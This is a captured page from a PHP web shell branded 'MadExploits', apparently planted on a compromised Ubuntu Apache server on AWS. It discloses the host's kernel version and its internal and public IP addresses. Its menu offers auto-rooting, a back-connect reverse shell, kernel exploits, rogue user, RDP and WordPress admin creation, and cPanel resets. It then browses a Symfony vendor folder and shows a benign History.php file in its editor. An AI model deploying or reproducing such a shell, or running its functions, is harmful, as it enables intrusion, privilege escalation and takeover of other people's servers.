Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.133.149.244
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
browser-kit /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxrwxr-x
Test
[ DIR ]
drwxrwxr-x
AbstractBrowser.php
21.34
KB
-rw-rw-r--
CHANGELOG.md
1.42
KB
-rw-rw-r--
Cookie.php
8.67
KB
-rw-rw-r--
CookieJar.php
6.31
KB
-rw-rw-r--
History.php
2.21
KB
-rw-rw-r--
HttpBrowser.php
4.66
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
704
B
-rw-rw-r--
Request.php
2.54
KB
-rw-rw-r--
Response.php
2.7
KB
-rw-rw-r--
composer.json
1.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : History.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\BrowserKit; /** * History. * * @author Fabien Potencier <fabien@symfony.com> */ class History { protected $stack = []; protected $position = -1; /** * Clears the history. */ public function clear() { $this->stack = []; $this->position = -1; } /** * Adds a Request to the history. */ public function add(Request $request) { $this->stack = \array_slice($this->stack, 0, $this->position + 1); $this->stack[] = clone $request; $this->position = \count($this->stack) - 1; } /** * Returns true if the history is empty. * * @return bool true if the history is empty, false otherwise */ public function isEmpty() { return 0 == \count($this->stack); } /** * Goes back in the history. * * @return Request A Request instance * * @throws \LogicException if the stack is already on the first page */ public function back() { if ($this->position < 1) { throw new \LogicException('You are already on the first page.'); } return clone $this->stack[--$this->position]; } /** * Goes forward in the history. * * @return Request A Request instance * * @throws \LogicException if the stack is already on the last page */ public function forward() { if ($this->position > \count($this->stack) - 2) { throw new \LogicException('You are already on the last page.'); } return clone $this->stack[++$this->position]; } /** * Returns the current element in the history. * * @return Request A Request instance * * @throws \LogicException if the stack is empty */ public function current() { if (-1 == $this->position) { throw new \LogicException('The page history is empty.'); } return clone $this->stack[$this->position]; } }
Close